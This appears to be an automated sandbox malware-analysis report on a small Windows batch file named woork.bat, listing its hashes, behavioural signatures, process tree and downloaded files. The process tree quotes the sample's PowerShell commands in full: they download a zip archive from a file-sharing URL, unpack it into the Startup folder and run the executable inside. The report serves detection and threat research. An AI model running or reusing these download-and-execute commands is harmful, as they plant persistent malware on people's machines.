Analysis
-
max time kernel
139s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
14/03/2023, 17:54
Static task
static1
Behavioral task
behavioral1
Sample
woork.bat
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
woork.bat
Resource
win10v2004-20230220-en
General
-
Target
woork.bat
-
Size
408B
-
MD5
d0c0cdc0fb8e18cec319416c4e45b142
-
SHA1
d9a9e5614e1fb05cafd7144893237b242a8d1a5f
-
SHA256
18b9fbc870d8ad4436dc177d00d67df1f71ceab03d558b53b6c8c7309c66b884
-
SHA512
e69f6b96f9a11a8d77dac1cd5ab1c7deb7a223b33cd085a321c4023bfaa7fb718022243e034d4580b55cf28d045a9b1262ceadf7a1e44e5ea364bdeab367ac3c
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 9 1764 powershell.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\air.zip powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\air\air.exe powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\air\air.exe powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2544 air.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1764 powershell.exe 1764 powershell.exe 980 powershell.exe 980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1764 powershell.exe Token: SeDebugPrivilege 980 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1688 wrote to memory of 908 1688 cmd.exe 87 PID 1688 wrote to memory of 908 1688 cmd.exe 87 PID 908 wrote to memory of 1764 908 cmd.exe 89 PID 908 wrote to memory of 1764 908 cmd.exe 89 PID 908 wrote to memory of 980 908 cmd.exe 90 PID 908 wrote to memory of 980 908 cmd.exe 90 PID 908 wrote to memory of 2544 908 cmd.exe 94 PID 908 wrote to memory of 2544 908 cmd.exe 94
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\woork.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\woork.bat min2⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -uri https://transfer.sh/get/D8bTsh/air.zip -o air.zip"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive air.zip"3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\air\air.exeair.exe3⤵
- Executes dropped EXE
PID:2544
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5143a478fb47996f74bbbcdaa252b9e0b
SHA1288893a45c1c50f8245a32aa06dfb1ac2ff31c83
SHA2566d91b6cc49e12bf850b873bfd57f591a37fe1aef5ca6e2bc8855dc866abf479b
SHA512e7e2d235fc60e58fe10961515db7f1a667cc58268b8cd3066afa5e7e4de0b1217e3cb85fbe24230b3eb7ac94399fa42971772954a0c309d3cb9334b7a67f93d8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1014KB
MD57316a78466e90774ec7fe9ef3710fc33
SHA1aee8d3cd79ada468b4afc48d7ad10cf6539136b7
SHA25689d1a471dcbcadebc43a570a347cd8a31d7323cf70d266670af0fbe99a2a5cb1
SHA5124ed13dad4075144951c6f7adbf22189cb9730b3f6add63f24ba750b8de26c315d4791d6a526b33612f5e70a8737d1c8b9a9f48e8bfbed5d82d51ce7f0a68cf26
-
Filesize
546.0MB
MD596e76869ca559f863971a6fd34a59880
SHA125e6a0aec1979ed0211f7a43169f84909768dc59
SHA256a50226277ea1a7650f631a480215838dd804d8cfb053a1d19953adb016239472
SHA512b790ec7f0d355300a6720c6335ba2935321ada6ba28a224a74880e3761de0a39931ea07f0ede69c957d89d1a15ea3f188e4a89d80dd5c283b9d2f74b30bd7bdd
-
Filesize
546.0MB
MD596e76869ca559f863971a6fd34a59880
SHA125e6a0aec1979ed0211f7a43169f84909768dc59
SHA256a50226277ea1a7650f631a480215838dd804d8cfb053a1d19953adb016239472
SHA512b790ec7f0d355300a6720c6335ba2935321ada6ba28a224a74880e3761de0a39931ea07f0ede69c957d89d1a15ea3f188e4a89d80dd5c283b9d2f74b30bd7bdd